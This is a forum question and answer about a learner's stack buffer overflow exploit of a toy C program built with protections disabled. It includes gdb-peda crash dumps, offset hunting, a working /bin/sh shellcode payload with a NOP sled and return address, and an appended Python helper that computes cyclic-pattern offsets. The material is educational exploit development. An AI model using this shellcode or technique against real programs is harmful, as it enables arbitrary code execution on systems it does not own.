
Buffer Overflow - Finding EIP

I am on Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux and I am learning to exploit buffer overflow vulnerabilities, so I'm quite bad at doing it yet; probably this will be an easy question, but I cannot find any useful resource online.

I am trying to exploit a simple program taking advantage of a buffer overflow vulnerability. The source code of the program is the following:

#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]){
        char buffer[64];

        if (argc < 2){
                printf("Error - Increase input!");
                return 1;
        }
        strcpy(buffer, argv[1]);
        return 0;
}

and the vulnerable function is strcpy.

I compiled it using:

gcc buf.c -o buf -fno-stack-protector -m32 -no-pie -z execstack -g

Finding the offset

So the first step I usually take is to build a buffer to find the right offset to write into the EIP.

kali@kali:~/Downloads/temp$ msf-pattern_create -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Using gdb (with peda installed), I run the program and I check the registers

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x33634132 ('2Ac3')
ECX: 0x63413163 ('c1Ac')
EDX: 0xffffd224 --> 0xffffd200 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A")
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x41346341 ('Ac4A')
ESP: 0x6341315f ('_1Ac')
EIP: 0x80491d8 (<main+102>:     ret)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d3 <main+97>: pop    ebx
   0x80491d4 <main+98>: pop    ebp
   0x80491d5 <main+99>: lea    esp,[ecx-0x4]
=> 0x80491d8 <main+102>:        ret    
   0x80491d9 <__x86.get_pc_thunk.ax>:   mov    eax,DWORD PTR [esp]
   0x80491dc <__x86.get_pc_thunk.ax+3>: ret    
   0x80491dd <__x86.get_pc_thunk.ax+4>: xchg   ax,ax
   0x80491df <__x86.get_pc_thunk.ax+6>: nop
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x6341315f
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080491d8 in main (argc=<error reading variable: Cannot access memory at address 0x63413163>, argv=<error reading variable: Cannot access memory at address 0x63413167>) at buf.c:13
13      }

As you can see above, I cannot see what's in EIP in order to use msf-pattern_offset to check what the offset of the EIP is.

Other Tests

Later on I tried other offsets and I noticed that if the buffer is exactly 64, the output is

gdb-peda$ run $(python -c 'print "A"*64')

##OUTPUT##
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('A' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('A' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('A' <repeats 48 times>)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('A' <repeats 48 times>)
0004| 0xffffd204 ('A' <repeats 44 times>)
0008| 0xffffd208 ('A' <repeats 40 times>)
0012| 0xffffd20c ('A' <repeats 36 times>)
0016| 0xffffd210 ('A' <repeats 32 times>)
0020| 0xffffd214 ('A' <repeats 28 times>)
0024| 0xffffd218 ('A' <repeats 24 times>)
0028| 0xffffd21c ('A' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

Researching that, I see that the EIP is exactly after 12 chars

gdb-peda$ run $(python -c 'print "A"*12 + "B"*4 + "C"*48')

#OUTPUT#
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('C' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('C' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('C' <repeats 48 times>)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('C' <repeats 48 times>)
0004| 0xffffd204 ('C' <repeats 44 times>)
0008| 0xffffd208 ('C' <repeats 40 times>)
0012| 0xffffd20c ('C' <repeats 36 times>)
0016| 0xffffd210 ('C' <repeats 32 times>)
0020| 0xffffd214 ('C' <repeats 28 times>)
0024| 0xffffd218 ('C' <repeats 24 times>)
0028| 0xffffd21c ('C' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

Using a 32-bit payload spawning a shell, my idea was to develop an exploit passing the following buffer to the program:

python -c 'print "\x90"*12 + "\x00\xd2\xff\xff" + "\x90"*12 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" + "\x90"*4'

and I get this output:

bash: warning: command substitution: ignored null byte in input
[Inferior 1 (process 5292) exited normally]
Warning: not running

So I think I am close, but I cannot figure out how to make it work.

SORRY FOR THE LENGTH OF THE QUESTION

bash: warning: command substitution: ignored null byte in input

bash uses C strings internally, so null bytes (\0) signify end-of-string for it. Try using zsh instead (i.e. run zsh and then your command as written).
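Added example, not code from the question or the answer above: a Python 3 script that rebuilds the msf-pattern_create cyclic pattern and looks up the offset of a register value the way msf-pattern_offset does, run over the register values copied from the first gdb-peda crash dump in the question. It also checks whether a 32-bit address contains the 0x00 byte that the answer explains bash drops in command substitution. The register values and the 0xffffd200 address come from the question; the function names are my own.

```python
import string
import struct

# Alphabets used by msf-pattern_create: every 3-byte chunk is Upper+lower+digit
# (Aa0 Aa1 ... Aa9 Ab0 ...), so a 4-byte window taken from a register identifies
# its position in the pattern (it repeats after 26*26*10*3 = 20280 bytes).
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> str:
    """Reproduce the msf-pattern_create cyclic pattern, truncated to `length` chars."""
    chunks = []
    size = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length: int = 20280) -> int:
    """Offset of a 4-byte window in the pattern, or -1 if the value holds no pattern bytes.

    `value` is either the register value as gdb prints it (an int; x86 stores it
    little-endian, so it is packed with '<I') or the 4-char string peda shows beside it.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    return pattern_create(length).find(needle)


def registers_from_crash(regs: dict) -> dict:
    """Map each register of a crash dump to its pattern offset (-1 = no pattern bytes)."""
    return {name: pattern_offset(val) for name, val in regs.items()}


def contains_nul(address: int) -> bool:
    """True if the little-endian encoding of `address` has a 0x00 byte, which bash's
    $(...) command substitution silently drops (the warning quoted in the question)."""
    return b"\x00" in struct.pack("<I", address)


# Register values copied from the first gdb-peda dump in the question (constructed input).
CRASH_REGS = {
    "ECX": 0x63413163,  # 'c1Ac'
    "EBX": 0x33634132,  # '2Ac3'
    "EBP": 0x41346341,  # 'Ac4A'
    "ESP": 0x6341315f,  # '_1Ac' == ECX - 4, the result of lea esp,[ecx-0x4]
}

if __name__ == "__main__":
    print(pattern_create(100))
    for reg, off in registers_from_crash(CRASH_REGS).items():
        print(f"{reg}: offset {off}")
    print("0xffffd200 contains a NUL byte:", contains_nul(0xffffd200))
```

Run against the first dump this gives ECX at offset 64, EBX at 68 and EBP at 72, i.e. the saved ECX sits right after the 64-byte buffer, followed by the saved EBX and EBP. EIP never shows pattern bytes in that dump because main's epilogue (lea esp,[ecx-0x4]; ret) takes the return address from wherever the overwritten ECX points, which is why peda reports ESP = ECX - 4 and "Invalid $SP address" instead of an EIP value you can feed to msf-pattern_offset. contains_nul(0xffffd200) is True: the low byte of that address is the null byte bash reported ignoring, so the argument the program received was not the one intended.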
